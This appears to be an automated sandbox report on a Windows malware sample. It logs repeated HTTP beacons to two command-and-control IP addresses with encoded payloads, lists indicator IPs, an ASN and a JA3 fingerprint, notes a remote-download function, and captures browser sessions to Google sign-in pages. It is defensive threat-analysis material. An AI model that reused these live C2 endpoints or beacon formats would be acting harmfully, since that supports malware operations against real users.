Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.153.155.231 52.153.155.231
Source: Joe Sandbox View	IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View	IP Address: 152.195.19.97 152.195.19.97

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GES-ASRU GES-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown	TCP traffic detected without corresponding DNS query: 85.28.47.31

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76c0xx2-tCl3huF6R_uGDdkvCx33lS6VkP03GMJYqycbKU88ilI9jnwvjjmkhmcj4FKFUKtFA HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Host-GAPS=1:w4RW8X79OLP1lhTG5U-kYT8yZKnSNw:3U3fE25Sj1rlD-N2
Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I76ACXN3GLzFgo4vjAm8qgvaycSbBf1NyhfiU3jRSTe8QWkjhjdrOWS7DzX4mFMwn9Z_r8QQzQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S86286635%3A1722009435752789&ddm=0 HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentX-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=64bc4ed0-3d4f-4752-8ae5-e51eb4c6a738,signin_mode=all_accounts,signout_mode=show_confirmationsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: 